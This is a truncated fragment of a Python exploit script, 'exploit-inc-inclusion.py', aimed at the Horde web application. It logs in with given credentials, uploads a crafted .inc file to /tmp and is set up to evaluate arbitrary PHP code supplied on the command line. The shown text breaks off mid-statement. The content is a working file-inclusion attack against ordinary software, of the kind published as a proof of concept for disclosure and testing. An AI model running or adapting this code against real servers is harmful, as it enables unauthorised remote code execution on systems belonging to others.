## exploit-inc-inclusion.py #!/usr/bin/env python3 from horde import Horde import subprocess import sys TEMP_DIR = '/tmp' if len(sys.argv) < 5: print('Usage: ') sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] filename = sys.argv[4] php_code = sys.argv[5] # log into the web application horde = Horde(base_url, username, password) # upload (delete manually) and evaluate the .inc file horde.upload_to_tmp('{}.inc'.format(filename), '